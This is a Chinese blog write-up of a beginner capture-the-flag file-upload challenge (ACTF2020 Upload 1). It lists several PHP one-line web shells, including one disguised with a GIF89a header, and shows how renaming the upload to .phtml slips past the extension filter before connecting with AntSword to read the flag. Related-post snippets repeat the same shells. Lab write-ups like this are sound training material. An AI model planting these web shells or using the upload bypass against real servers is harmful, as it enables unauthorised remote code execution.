[ACTF2020 新生赛]Upload 1

已于 2022-08-05 10:21:32 修改
阅读量2.4k 收藏
点赞数
文章标签: php 安全
于 2022-01-11 22:58:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50034496/article/details/122443529
版权

常见的一句话木马

<?php eval($_POST['z'])?>
<?php $_GET['a']($_POST['z'])?>
文件内容为(包含gif的文件幻术头,以及一句话木马)
GIF89a? 
<script language="php">eval($_REQUEST[1])</script>

题目主页
在这里插入图片描述首先上传php文件发现不能上传成功,再上传jpg格式的一句话,bp抓包改为php,php3,php4,php5,php7,pht,phps,发现不能成功
上传attack.php,内容如下 ,修改文件类型为phtml,文件上传成功

 <?php @eval($_POST['attack']);?>

在这里插入图片描述
在这里插入图片描述
先上传包含一句话木马的jpg文件

在这里插入图片描述

在这里插入图片描述

抓包修改后缀发现上传失败,如下图
在这里插入图片描述
在这里插入图片描述

尝试修改后缀为phtml,上传成功
.phtml文件的解释:一个嵌入了PHP脚本的html页面
在这里插入图片描述

通过蚁剑连接
http://7a992abb-fdb8-4d35-848c-779ffbbd742a.node4.buuoj.cn:81/uplo4d/c619245d4cef9b335fd130623d0aa8f3.phtml

在这里插入图片描述
获取flag
在这里插入图片描述

是小桑呢
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ACTF2020 新生]Upload1
人若无名,便可专心练剑
03-19 899
[ACTF2020 新生]Upload1
[ACTF2020 新生]Upload1(详解)
2301_77451464的博客
02-04 1013
buuctf web [ACTF2020 新生]Upload1(详解)
[ACTF2020 新生]Upload--BUUCTF
最新发布
XiaoYeZhu_1314的博客
04-24 289
得到:Upload Success!第二步:使用bp抓上传jpg文件的包,在修改文件后缀名为phtml。第一步:上传php文件,他提示,只能上传jpg、png、gif。第四步:拼接访问,连接蚁剑,找到flag。第三步:进行放过,在访问浏览器。
BUUCTF-[ACTF2020 新生]Upload1
Monica的博客
09-22 1582
目录 题目: 分析: 题目: 打开之后啥也没有,鼠标放在中间的灯上面发现有文件上传的地方,猜测是一个文件上传漏洞 分析: 先随便上传一个文件,发现提示 并且bp抓包并没有抓到包,说明为前端检测过滤。 那就上传jpg,png,gif这三种类型的文件,然后bp抓包在修改后缀为php。 先上传一个jpg文件,内容为<?php phpinfo();?>。 发现后端还是进行了检查过滤 那就试试其他几种后缀: 绕过后缀的有文件格式有php,php3,php...
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
学习matlab的基本使用例子,有矩阵运算,绘制曲线图等
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
NTFS文件系统分析
09-19
NTFS文件系统分析,比较详细的介绍,各个元文件的定义,偏移
光立方888 573 2803程序
06-14
光立方888 573 2803程序,有详细的原理图
buuctf[ACTF2020 新生]Upload 1
qq_53175607的博客
12-06 610
1.打开题目,先上传一句话木马试试。 <script language='php'>@eval($_POST['love']);</script> 按照传统方法,现将一句话木马利用windows文件后缀识别的特点,将后缀名改为图片后缀名。 上传,抓包改包! 改为phtml后缀 上传成功,构架url用蚁剑连接。 http://5081ca11-6534-49bf-8f3b-94c45fc9946e.node4.buuoj.cn:81/uplo4d/38a64fe21fe9be
[ACTF2020 新生]Upload
weixin_41571993的博客
10-04 258
靶场练习
buuctf-[ACTF2020 新生]Upload(小宇特详解)
小宇的web博客
01-15 2724
buuctf-[ACTF2020 新生]Upload(小宇特详解) 这里把鼠标放到小灯泡上,发现小灯泡亮了且有文件上传的地方。 这里先上传一个php文件来查看能否上传 这里只能上传指定类型的。查看源代码。 这里进行了前端验证。 这里尝试一下抓包,修改后缀进行上传。 这里写一个一句话木马。 GIF89a//在文件前加上GIF89a来绕过PHP getimagesize的检查,来绕过文件内容头校验 <script language="php">eval($_POST['shell']);&lt
buuctf-web-[ACTF2020 新生]Upload 1-wp
居上
11-11 3476
[ACTF2020 新生]Upload 1 来到主页发现是一个文件上传的题目。 先随便上传一个文件试一试。 我上传了一个.php结尾的PHP一句话木马,可以看到被过滤了。审查一下元素。 可以发现前端有一个事件,直接删除该事件。再上传一遍试一试。 发现还是不能传上去,后端肯定也做了过滤。我们可以创建一个test.phtml文件。 对.phtml文件的解释: 是一个嵌入了PHP脚本的html页面。 将以下代码写入该文件中。 <script language='php'>@eval($_POST[
buuctf [ACTF2020 新生]Upload 1
Naptmn的博客
02-24 1181
直接上传一个php的一句话发现无法上传 f12找到前端验证 这里有两个方法 1、直接删除这个元素 2、先上传jpg格式的一句话,bp抓包改为php 发现上传后后端仍然有检查 于是我们上传phtml格式的一句话木马(这里同样需要绕开前端验证) phtml可以理解为是另外一个php的文件后缀名 上传成功后蚁剑连接即可 ...
[ACTF2020 新生]BackupFile 1
07-25
鉴于提供的引用内容,\[ACTF2020 新生\]BackupFile 1是一道题目,它涉及到备份文件的寻找和查看。常见的备份文件包括“.git”、“.svn”、“.swp”、“.~”、“.bak”、“.bash_history”、“.bkf”。可以使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值